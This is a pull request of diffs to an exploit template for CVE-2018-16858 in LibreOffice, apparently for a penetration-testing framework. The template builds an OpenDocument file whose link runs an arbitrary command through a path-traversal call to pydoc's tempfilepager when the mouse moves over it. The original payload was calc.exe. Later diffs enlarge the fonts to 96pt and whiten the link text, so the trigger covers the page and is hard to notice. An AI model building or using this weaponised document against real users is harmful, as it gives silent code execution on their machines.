### PR TITLE
Add Libreoffice macro exec exploit module

### DIFF
--- a/data/exploits/CVE-2018-16858/librefile.erb
+++ b/data/exploits/CVE-2018-16858/librefile.erb
@@ -2,122 +2,6 @@
 
 <office:document xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0" xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0" xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0" xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0" xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0" xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0" xmlns:math="http://www.w3.org/1998/Math/MathML" xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0" xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" xmlns:config="urn:oasis:names:tc:opendocument:xmlns:config:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:ooow="http://openoffice.org/2004/writer" xmlns:oooc="http://openoffice.org/2004/calc" xmlns:dom="http://www.w3.org/2001/xml-events" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:rpt="http://openoffice.org/2005/report" xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2" xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:officeooo="http://openoffice.org/2009/office" xmlns:tableooo="http://openoffice.org/2009/table" xmlns:drawooo="http://openoffice.org/2010/draw" xmlns:calcext="urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0" xmlns:loext="urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0" xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0" xmlns:formx="urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0" xmlns:css3t="http://www.w3.org/TR/css3-text/" office:version="1.2" office:mimetype="application/vnd.oasis.opendocument.text">
  <office:meta><meta:creation-date>2019-01-30T10:53:06.762000000</meta:creation-date><dc:date>2019-01-30T10:53:49.512000000</dc:date><meta:editing-duration>PT44S</meta:editing-duration><meta:editing-cycles>1</meta:editing-cycles><meta:document-statistic meta:table-count="0" meta:image-count="0" meta:object-count="0" meta:page-count="1" meta:paragraph-count="1" meta:word-count="1" meta:character-count="4" meta:non-whitespace-character-count="4"/><meta:generator>LibreOffice/6.1.2.1$Windows_X86_64 LibreOffice_project/65905a128db06ba48db947242809d14d3f9a93fe</meta:generator></office:meta>
- <office:settings>
-  <config:config-item-set config:name="ooo:view-settings">
-   <config:config-item config:name="ViewAreaTop" config:type="long">0</config:config-item>
-   <config:config-item config:name="ViewAreaLeft" config:type="long">0</config:config-item>
-   <config:config-item config:name="ViewAreaWidth" config:type="long">35959</config:config-item>
-   <config:config-item config:name="ViewAreaHeight" config:type="long">12913</config:config-item>
-   <config:config-item config:name="ShowRedlineChanges" config:type="boolean">true</config:config-item>
-   <config:config-item config:name="InBrowseMode" config:type="boolean">false</config:config-item>
-   <config:config-item-map-indexed config:name="Views">
-    <config:config-item-map-entry>
-     <config:config-item config:name="ViewId" config:type="string">view2</config:config-item>
-     <config:config-item config:name="ViewLeft" config:type="long">9772</config:config-item>
-     <config:config-item config:name="ViewTop" config:type="long">2501</config:config-item>
-     <config:config-item config:name="VisibleLeft" config:type="long">0</config:config-item>
-     <config:config-item config:name="VisibleTop" config:type="long">0</config:config-item>
-     <config:config-item config:name="VisibleRight" config:type="long">35957</config:config-item>
-     <config:config-item config:name="VisibleBottom" config:type="long">12912</config:config-item>
-     <config:config-item config:name="ZoomType" config:type="short">0</config:config-item>
-     <config:config-item config:name="ViewLayoutColumns" config:type="short">1</config:config-item>
-     <config:config-item config:name="ViewLayoutBookMode" config:type="boolean">false</config:config-item>
-     <config:config-item config:name="ZoomFactor" config:type="short">100</config:config-item>
-     <config:config-item config:name="IsSelectedFrame" config:type="boolean">false</config:config-item>
-     <config:config-item config:name="AnchoredTextOverflowLegacy" config:type="boolean">false</config:config-item>
-    </config:config-item-map-entry>
-   </config:config-item-map-indexed>
-  </config:config-item-set>
-  <config:config-item-set config:name="ooo:configuration-settings">
-   <config:config-item config:name="ProtectForm" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="PrinterName" config:type="string"/>
-   <config:config-item config:name="EmbeddedDatabaseName" config:type="string"/>
-   <config:config-item config:name="CurrentDatabaseDataSource" config:type="string"/>
-   <config:config-item config:name="LinkUpdateMode" config:type="short">1</config:config-item>
-   <config:config-item config:name="AddParaTableSpacingAtStart" config:type="boolean">true</config:config-item>
-   <config:config-item config:name="FloattableNomargins" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="UnbreakableNumberings" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="FieldAutoUpdate" config:type="boolean">true</config:config-item>
-   <config:config-item config:name="AddVerticalFrameOffsets" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="BackgroundParaOverDrawings" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="AddParaTableSpacing" config:type="boolean">true</config:config-item>
-   <config:config-item config:name="ChartAutoUpdate" config:type="boolean">true</config:config-item>
-   <config:config-item config:name="CurrentDatabaseCommand" config:type="string"/>
-   <config:config-item config:name="AlignTabStopPosition" config:type="boolean">true</config:config-item>
-   <config:config-item config:name="PrinterSetup" config:type="base64Binary"/>
-   <config:config-item config:name="PrinterPaperFromSetup" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="IsKernAsianPunctuation" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="CharacterCompressionType" config:type="short">0</config:config-item>
-   <config:config-item config:name="ApplyUserData" config:type="boolean">true</config:config-item>
-   <config:config-item config:name="SaveGlobalDocumentLinks" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="SmallCapsPercentage66" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="CurrentDatabaseCommandType" config:type="int">0</config:config-item>
-   <config:config-item config:name="SaveVersionOnClose" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="UpdateFromTemplate" config:type="boolean">true</config:config-item>
-   <config:config-item config:name="PrintSingleJobs" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="PrinterIndependentLayout" config:type="string">high-resolution</config:config-item>
-   <config:config-item config:name="EmbedSystemFonts" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="DoNotCaptureDrawObjsOnPage" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="UseFormerObjectPositioning" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="IsLabelDocument" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="AddFrameOffsets" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="AddExternalLeading" config:type="boolean">true</config:config-item>
-   <config:config-item config:name="UseOldNumbering" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="OutlineLevelYieldsNumbering" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="DoNotResetParaAttrsForNumFont" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="IgnoreFirstLineIndentInNumbering" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="AllowPrintJobCancel" config:type="boolean">true</config:config-item>
-   <config:config-item config:name="UseFormerLineSpacing" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="AddParaSpacingToTableCells" config:type="boolean">true</config:config-item>
-   <config:config-item config:name="UseFormerTextWrapping" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="RedlineProtectionKey" config:type="base64Binary"/>
-   <config:config-item config:name="ConsiderTextWrapOnObjPos" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="DoNotJustifyLinesWithManualBreak" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="EmbedFonts" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="TableRowKeep" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="TabsRelativeToIndent" config:type="boolean">true</config:config-item>
-   <config:config-item config:name="IgnoreTabsAndBlanksForLineCalculation" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="RsidRoot" config:type="int">1115298</config:config-item>
-   <config:config-item config:name="LoadReadonly" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="ClipAsCharacterAnchoredWriterFlyFrames" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="UnxForceZeroExtLeading" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="UseOldPrinterMetrics" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="TabAtLeftIndentForParagraphsInList" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="Rsid" config:type="int">1115298</config:config-item>
-   <config:config-item config:name="MsWordCompTrailingBlanks" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="MathBaselineAlignment" config:type="boolean">true</config:config-item>
-   <config:config-item config:name="InvertBorderSpacing" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="CollapseEmptyCellPara" config:type="boolean">true</config:config-item>
-   <config:config-item config:name="TabOverflow" config:type="boolean">true</config:config-item>
-   <config:config-item config:name="StylesNoDefault" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="ClippedPictures" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="TabOverMargin" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="TreatSingleColumnBreakAsPageBreak" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="SurroundTextWrapSmall" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="ApplyParagraphMarkFormatToNumbering" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="PropLineSpacingShrinksFirstLine" config:type="boolean">true</config:config-item>
-   <config:config-item config:name="SubtractFlysAnchoredAtFlys" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="DisableOffPagePositioning" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="EmptyDbFieldHidesPara" config:type="boolean">true</config:config-item>
-   <config:config-item config:name="PrintAnnotationMode" config:type="short">0</config:config-item>
-   <config:config-item config:name="PrintGraphics" config:type="boolean">true</config:config-item>
-   <config:config-item config:name="PrintBlackFonts" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="PrintProspect" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="PrintLeftPages" config:type="boolean">true</config:config-item>
-   <config:config-item config:name="PrintControls" config:type="boolean">true</config:config-item>
-   <config:config-item config:name="PrintPageBackground" config:type="boolean">true</config:config-item>
-   <config:config-item config:name="PrintTextPlaceholder" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="PrintDrawings" config:type="boolean">true</config:config-item>
-   <config:config-item config:name="PrintHiddenText" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="PrintTables" config:type="boolean">true</config:config-item>
-   <config:config-item config:name="PrintProspectRTL" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="PrintReversed" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="PrintRightPages" config:type="boolean">true</config:config-item>
-   <config:config-item config:name="PrintFaxName" config:type="string"/>
-   <config:config-item config:name="PrintPaperFromSetup" config:type="boolean">false</config:config-item>
-   <config:config-item config:name="PrintEmptyPages" config:type="boolean">false</config:config-item>
-  </config:config-item-set>
- </office:settings>
  <office:scripts>
   <office:script script:language="ooo:Basic">
    <ooo:libraries xmlns:ooo="http://openoffice.org/2004/office" xmlns:xlink="http://www.w3.org/1999/xlink">
@@ -125,14 +9,6 @@
    </ooo:libraries>
   </office:script>
  </office:scripts>
- <office:font-face-decls>
-  <style:font-face style:name="Arial1" svg:font-family="Arial" style:font-family-generic="swiss"/>
-  <style:font-face style:name="Liberation Serif" svg:font-family="&apos;Liberation Serif&apos;" style:font-family-generic="roman" style:font-pitch="variable"/>
-  <style:font-face style:name="Liberation Sans" svg:font-family="&apos;Liberation Sans&apos;" style:font-family-generic="swiss" style:font-pitch="variable"/>
-  <style:font-face style:name="Arial" svg:font-family="Arial" style:font-family-generic="system" style:font-pitch="variable"/>
-  <style:font-face style:name="Microsoft YaHei" svg:font-family="&apos;Microsoft YaHei&apos;" style:font-family-generic="system" style:font-pitch="variable"/>
-  <style:font-face style:name="NSimSun" svg:font-family="NSimSun" style:font-family-generic="system" style:font-pitch="variable"/>
- </office:font-face-decls>
  <office:styles>
   <style:default-style style:family="graphic">
    <style:graphic-properties svg:stroke-color="#3465a4" draw:fill-color="#729fcf" fo:wrap-option="no-wrap" draw:shadow-offset-x="0.1181in" draw:shadow-offset-y="0.1181in" draw:start-line-spacing-horizontal="0.1114in" draw:start-line-spacing-vertical="0.1114in" draw:end-line-spacing-horizontal="0.1114in" draw:end-line-spacing-vertical="0.1114in" style:flow-with-text="false"/>
@@ -152,107 +28,18 @@
    <style:table-row-properties fo:keep-together="auto"/>
   </style:default-style>
   <style:style style:name="Standard" style:family="paragraph" style:class="text"/>
-  <style:style style:name="Heading" style:family="paragraph" style:parent-style-name="Standard" style:next-style-name="Text_20_body" style:class="text">
-   <style:paragraph-properties fo:margin-top="0.1665in" fo:margin-bottom="0.0835in" loext:contextual-spacing="false" fo:keep-with-next="always"/>
-   <style:text-properties style:font-name="Liberation Sans" fo:font-family="&apos;Liberation Sans&apos;" style:font-family-generic="swiss" style:font-pitch="variable" fo:font-size="96pt" style:font-name-asian="Microsoft YaHei" style:font-family-asian="&apos;Microsoft YaHei&apos;" style:font-family-generic-asian="system" style:font-pitch-asian="variable" style:font-size-asian="96pt" style:font-name-complex="Arial" style:font-family-complex="Arial" style:font-family-generic-complex="system" style:font-pitch-complex="variable" style:font-size-complex="96pt"/>
-  </style:style>
   <style:style style:name="Text_20_body" style:display-name="Text body" style:family="paragraph" style:parent-style-name="Standard" style:class="text">
    <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0.0972in" loext:contextual-spacing="false" fo:line-height="115%"/>
-  </style:style>
-  <style:style style:name="List" style:family="paragraph" style:parent-style-name="Text_20_body" style:class="list">
-   <style:text-properties style:font-size-asian="96pt" style:font-name-complex="Arial1" style:font-family-complex="Arial" style:font-family-generic-complex="swiss"/>
-  </style:style>
-  <style:style style:name="Caption" style:family="paragraph" style:parent-style-name="Standard" style:class="extra">
-   <style:paragraph-properties fo:margin-top="0.0835in" fo:margin-bottom="0.0835in" loext:contextual-spacing="false" text:number-lines="false" text:line-number="0"/>
-   <style:text-properties fo:font-size="96pt" fo:font-style="italic" style:font-size-asian="96pt" style:font-style-asian="italic" style:font-name-complex="Arial1" style:font-family-complex="Arial" style:font-family-generic-complex="swiss" style:font-size-complex="96pt" style:font-style-complex="italic"/>
-  </style:style>
-  <style:style style:name="Index" style:family="paragraph" style:parent-style-name="Standard" style:class="index">
-   <style:paragraph-properties text:number-lines="false" text:line-number="0"/>
-   <style:text-properties style:font-size-asian="96pt" style:font-name-complex="Arial1" style:font-family-complex="Arial" style:font-family-generic-complex="swiss"/>
   </style:style>
   <style:style style:name="Internet_20_link" style:display-name="Internet link" style:family="text">
    <style:text-properties fo:color="#ffffff" fo:language="zxx" fo:country="none" style:text-underline-style="solid" style:text-underline-width="auto" style:text-underline-color="font-color" style:language-asian="zxx" style:country-asian="none" style:language-complex="zxx" style:country-complex="none"/>
   </style:style>
-  <text:outline-style style:name="Outline">
-   <text:outline-level-style text:level="1" style:num-format="">
-    <style:list-level-properties text:list-level-position-and-space-mode="label-alignment">
-     <style:list-level-label-alignment text:label-followed-by="listtab"/>
-    </style:list-level-properties>
-   </text:outline-level-style>
-   <text:outline-level-style text:level="2" style:num-format="">
-    <style:list-level-properties text:list-level-position-and-space-mode="label-alignment">
-     <style:list-level-label-alignment text:label-followed-by="listtab"/>
-    </style:list-level-properties>
-   </text:outline-level-style>
-   <text:outline-level-style text:level="3" style:num-format="">
-    <style:list-level-properties text:list-level-position-and-space-mode="label-alignment">
-     <style:list-level-label-alignment text:label-followed-by="listtab"/>
-    </style:list-level-properties>
-   </text:outline-level-style>
-   <text:outline-level-style text:level="4" style:num-format="">
-    <style:list-level-properties text:list-level-position-and-space-mode="label-alignment">
-     <style:list-level-label-alignment text:label-followed-by="listtab"/>
-    </style:list-level-properties>
-   </text:outline-level-style>
-   <text:outline-level-style text:level="5" style:num-format="">
-    <style:list-level-properties text:list-level-position-and-space-mode="label-alignment">
-     <style:list-level-label-alignment text:label-followed-by="listtab"/>
-    </style:list-level-properties>
-   </text:outline-level-style>
-   <text:outline-level-style text:level="6" style:num-format="">
-    <style:list-level-properties text:list-level-position-and-space-mode="label-alignment">
-     <style:list-level-label-alignment text:label-followed-by="listtab"/>
-    </style:list-level-properties>
-   </text:outline-level-style>
-   <text:outline-level-style text:level="7" style:num-format="">
-    <style:list-level-properties text:list-level-position-and-space-mode="label-alignment">
-     <style:list-level-label-alignment text:label-followed-by="listtab"/>
-    </style:list-level-properties>
-   </text:outline-level-style>
-   <text:outline-level-style text:level="8" style:num-format="">
-    <style:list-level-properties text:list-level-position-and-space-mode="label-alignment">
-     <style:list-level-label-alignment text:label-followed-by="listtab"/>
-    </style:list-level-properties>
-   </text:outline-level-style>
-   <text:outline-level-style text:level="9" style:num-format="">
-    <style:list-level-properties text:list-level-position-and-space-mode="label-alignment">
-     <style:list-level-label-alignment text:label-followed-by="listtab"/>
-    </style:list-level-properties>
-   </text:outline-level-style>
-   <text:outline-level-style text:level="10" style:num-format="">
-    <style:list-level-properties text:list-level-position-and-space-mode="label-alignment">
-     <style:list-level-label-alignment text:label-followed-by="listtab"/>
-    </style:list-level-properties>
-   </text:outline-level-style>
-  </text:outline-style>
-  <text:notes-configuration text:note-class="footnote" style:num-format="1" text:start-value="0" text:footnotes-position="page" text:start-numbering-at="document"/>
-  <text:notes-configuration text:note-class="endnote" style:num-format="i" text:start-value="0"/>
-  <text:linenumbering-configuration text:number-lines="false" text:offset="0.1965in" style:num-format="1" text:number-position="left" text:increment="5"/>
  </office:styles>
- <office:automatic-styles>
-  <style:style style:name="T1" style:family="text">
-   <style:text-properties officeooo:rsid="001104a2"/>
-  </style:style>
-  <style:page-layout style:name="pm1">
-   <style:page-layout-properties fo:page-width="8.5in" fo:page-height="11in" style:num-format="1" style:print-orientation="portrait" fo:margin-top="0.7874in" fo:margin-bottom="0.7874in" fo:margin-left="0.7874in" fo:margin-right="0.7874in" style:writing-mode="lr-tb" style:footnote-max-height="0in">
-    <style:footnote-sep style:width="0.0071in" style:distance-before-sep="0.0398in" style:distance-after-sep="0.0398in" style:line-style="solid" style:adjustment="left" style:rel-width="25%" style:color="#000000"/>
-   </style:page-layout-properties>
-   <style:header-style/>
-   <style:footer-style/>
-  </style:page-layout>
- </office:automatic-styles>
  <office:master-styles>
   <style:master-page style:name="Standard" style:page-layout-name="pm1"/>
  </office:master-styles>
  <office:body>
   <office:text>
-   <text:sequence-decls>
-    <text:sequence-decl text:display-outline-level="0" text:name="Illustration"/>
-    <text:sequence-decl text:display-outline-level="0" text:name="Table"/>
-    <text:sequence-decl text:display-outline-level="0" text:name="Text"/>
-    <text:sequence-decl text:display-outline-level="0" text:name="Drawing"/>
-    <text:sequence-decl text:display-outline-level="0" text:name="Figure"/>
-   </text:sequence-decls>
    <text:p text:style-name="Standard"><text:a xlink:type="simple" xlink:href="http://<%=text_content%>/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><office:event-listeners><script:event-listener script:language="ooo:script" script:event-name="dom:mouseover" xlink:href="vnd.sun.star.script:<%= path %>$tempfilepager(1, <%= @cmd %>)?language=Python&amp;location=share" xlink:type="simple"/></office:event-listeners><text:span text:style-name="T1"><%= text_content %></text:span></text:a></text:p>
   </office:text>
  </office:body>

--- a/data/exploits/CVE-2018-16858/librefile.erb
+++ b/data/exploits/CVE-2018-16858/librefile.erb
@@ -253,7 +253,7 @@
     <text:sequence-decl text:display-outline-level="0" text:name="Drawing"/>
     <text:sequence-decl text:display-outline-level="0" text:name="Figure"/>
    </text:sequence-decls>
-   <text:p text:style-name="Standard"><text:a xlink:type="simple" xlink:href="http://test/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><office:event-listeners><script:event-listener script:language="ooo:script" script:event-name="dom:mouseover" xlink:href="vnd.sun.star.script:../../../program/python-core-3.5.5/lib/pydoc.py$tempfilepager(1, calc.exe )?language=Python&amp;location=share" xlink:type="simple"/></office:event-listeners><text:span text:style-name="T1">move your mouse over the text</text:span></text:a></text:p>
+   <text:p text:style-name="Standard"><text:a xlink:type="simple" xlink:href="http://test/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><office:event-listeners><script:event-listener script:language="ooo:script" script:event-name="dom:mouseover" xlink:href="vnd.sun.star.script:<%= path %>$tempfilepager(1, <%= cmd %>)?language=Python&amp;location=share" xlink:type="simple"/></office:event-listeners><text:span text:style-name="T1"><%= text_content %></text:span></text:a></text:p>
   </office:text>
  </office:body>
 </office:document>

--- a/data/exploits/CVE-2018-16858/librefile.erb
+++ b/data/exploits/CVE-2018-16858/librefile.erb
@@ -139,11 +139,11 @@
    <style:paragraph-properties style:text-autospace="ideograph-alpha" style:line-break="strict" style:font-independent-line-spacing="false">
     <style:tab-stops/>
    </style:paragraph-properties>
-   <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="12pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="10.5pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="12pt" style:language-complex="hi" style:country-complex="IN"/>
+   <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="96pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="96pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="96pt" style:language-complex="hi" style:country-complex="IN"/>
   </style:default-style>
   <style:default-style style:family="paragraph">
    <style:paragraph-properties fo:orphans="2" fo:widows="2" fo:hyphenation-ladder-count="no-limit" style:text-autospace="ideograph-alpha" style:punctuation-wrap="hanging" style:line-break="strict" style:tab-stop-distance="0.4925in" style:writing-mode="page"/>
-   <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="12pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="10.5pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="12pt" style:language-complex="hi" style:country-complex="IN" fo:hyphenate="false" fo:hyphenation-remain-char-count="2" fo:hyphenation-push-char-count="2"/>
+   <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="96pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="96pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="96pt" style:language-complex="hi" style:country-complex="IN" fo:hyphenate="false" fo:hyphenation-remain-char-count="2" fo:hyphenation-push-char-count="2"/>
   </style:default-style>
   <style:default-style style:family="table">
    <style:table-properties table:border-model="collapsing"/>
@@ -154,24 +154,24 @@
   <style:style style:name="Standard" style:family="paragraph" style:class="text"/>
   <style:style style:name="Heading" style:family="paragraph" style:parent-style-name="Standard" style:next-style-name="Text_20_body" style:class="text">
    <style:paragraph-properties fo:margin-top="0.1665in" fo:margin-bottom="0.0835in" loext:contextual-spacing="false" fo:keep-with-next="always"/>
-   <style:text-properties style:font-name="Liberation Sans" fo:font-family="&apos;Liberation Sans&apos;" style:font-family-generic="swiss" style:font-pitch="variable" fo:font-size="14pt" style:font-name-asian="Microsoft YaHei" style:font-family-asian="&apos;Microsoft YaHei&apos;" style:font-family-generic-asian="system" style:font-pitch-asian="variable" style:font-size-asian="14pt" style:font-name-complex="Arial" style:font-family-complex="Arial" style:font-family-generic-complex="system" style:font-pitch-complex="variable" style:font-size-complex="14pt"/>
+   <style:text-properties style:font-name="Liberation Sans" fo:font-family="&apos;Liberation Sans&apos;" style:font-family-generic="swiss" style:font-pitch="variable" fo:font-size="96pt" style:font-name-asian="Microsoft YaHei" style:font-family-asian="&apos;Microsoft YaHei&apos;" style:font-family-generic-asian="system" style:font-pitch-asian="variable" style:font-size-asian="96pt" style:font-name-complex="Arial" style:font-family-complex="Arial" style:font-family-generic-complex="system" style:font-pitch-complex="variable" style:font-size-complex="96pt"/>
   </style:style>
   <style:style style:name="Text_20_body" style:display-name="Text body" style:family="paragraph" style:parent-style-name="Standard" style:class="text">
    <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0.0972in" loext:contextual-spacing="false" fo:line-height="115%"/>
   </style:style>
   <style:style style:name="List" style:family="paragraph" style:parent-style-name="Text_20_body" style:class="list">
-   <style:text-properties style:font-size-asian="12pt" style:font-name-complex="Arial1" style:font-family-complex="Arial" style:font-family-generic-complex="swiss"/>
+   <style:text-properties style:font-size-asian="96pt" style:font-name-complex="Arial1" style:font-family-complex="Arial" style:font-family-generic-complex="swiss"/>
   </style:style>
   <style:style style:name="Caption" style:family="paragraph" style:parent-style-name="Standard" style:class="extra">
    <style:paragraph-properties fo:margin-top="0.0835in" fo:margin-bottom="0.0835in" loext:contextual-spacing="false" text:number-lines="false" text:line-number="0"/>
-   <style:text-properties fo:font-size="12pt" fo:font-style="italic" style:font-size-asian="12pt" style:font-style-asian="italic" style:font-name-complex="Arial1" style:font-family-complex="Arial" style:font-family-generic-complex="swiss" style:font-size-complex="12pt" style:font-style-complex="italic"/>
+   <style:text-properties fo:font-size="96pt" fo:font-style="italic" style:font-size-asian="96pt" style:font-style-asian="italic" style:font-name-complex="Arial1" style:font-family-complex="Arial" style:font-family-generic-complex="swiss" style:font-size-complex="96pt" style:font-style-complex="italic"/>
   </style:style>
   <style:style style:name="Index" style:family="paragraph" style:parent-style-name="Standard" style:class="index">
    <style:paragraph-properties text:number-lines="false" text:line-number="0"/>
-   <style:text-properties style:font-size-asian="12pt" style:font-name-complex="Arial1" style:font-family-complex="Arial" style:font-family-generic-complex="swiss"/>
+   <style:text-properties style:font-size-asian="96pt" style:font-name-complex="Arial1" style:font-family-complex="Arial" style:font-family-generic-complex="swiss"/>
   </style:style>
   <style:style style:name="Internet_20_link" style:display-name="Internet link" style:family="text">
-   <style:text-properties fo:color="#000080" fo:language="zxx" fo:country="none" style:text-underline-style="solid" style:text-underline-width="auto" style:text-underline-color="font-color" style:language-asian="zxx" style:country-asian="none" style:language-complex="zxx" style:country-complex="none"/>
+   <style:text-properties fo:color="#ffffff" fo:language="zxx" fo:country="none" style:text-underline-style="solid" style:text-underline-width="auto" style:text-underline-color="font-color" style:language-asian="zxx" style:country-asian="none" style:language-complex="zxx" style:country-complex="none"/>
   </style:style>
   <text:outline-style style:name="Outline">
    <text:outline-level-style text:level="1" style:num-format="">
@@ -253,7 +253,7 @@
     <text:sequence-decl text:display-outline-level="0" text:name="Drawing"/>
     <text:sequence-decl text:display-outline-level="0" text:name="Figure"/>
    </text:sequence-decls>
-   <text:p text:style-name="Standard"><text:a xlink:type="simple" xlink:href="http://test/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><office:event-listeners><script:event-listener script:language="ooo:script" script:event-name="dom:mouseover" xlink:href="vnd.sun.star.script:<%= path %>$tempfilepager(1, <%= @cmd %>)?language=Python&amp;location=share" xlink:type="simple"/></office:event-listeners><text:span text:style-name="T1"><%= text_content %></text:span></text:a></text:p>
+   <text:p text:style-name="Standard"><text:a xlink:type="simple" xlink:href="http://<%=text_content%>/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><office:event-listeners><script:event-listener script:language="ooo:script" script:event-name="dom:mouseover" xlink:href="vnd.sun.star.script:<%= path %>$tempfilepager(1, <%= @cmd %>)?language=Python&amp;location=share" xlink:type="simple"/></office:event-listeners><text:span text:style-name="T1"><%= text_content %></text:span></text:a></text:p>
   </office:text>
  </office:body>
 </office:document>

--- a/data/exploits/CVE-2018-16858/librefile.erb
+++ b/data/exploits/CVE-2018-16858/librefile.erb
@@ -253,7 +253,7 @@
     <text:sequence-decl text:display-outline-level="0" text:name="Drawing"/>
     <text:sequence-decl text:display-outline-level="0" text:name="Figure"/>
    </text:sequence-decls>
-   <text:p text:style-name="Standard"><text:a xlink:type="simple" xlink:href="http://test/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><office:event-listeners><script:event-listener script:language="ooo:script" script:event-name="dom:mouseover" xlink:href="vnd.sun.star.script:<%= path %>$tempfilepager(1, <%= cmd %>)?language=Python&amp;location=share" xlink:type="simple"/></office:event-listeners><text:span text:style-name="T1"><%= text_content %></text:span></text:a></text:p>
+   <text:p text:style-name="Standard"><text:a xlink:type="simple" xlink:href="http://test/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><office:event-listeners><script:event-listener script:language="ooo:script" script:event-name="dom:mouseover" xlink:href="vnd.sun.star.script:<%= path %>$tempfilepager(1, <%= @cmd %>)?language=Python&amp;location=share" xlink:type="simple"/></office:event-listeners><text:span text:style-name="T1"><%= text_content %></text:span></text:a></text:p>
   </office:text>
  </office:body>
 </office:document>

--- a/data/exploits/CVE-2018-16858/librefile.erb
+++ b/data/exploits/CVE-2018-16858/librefile.erb
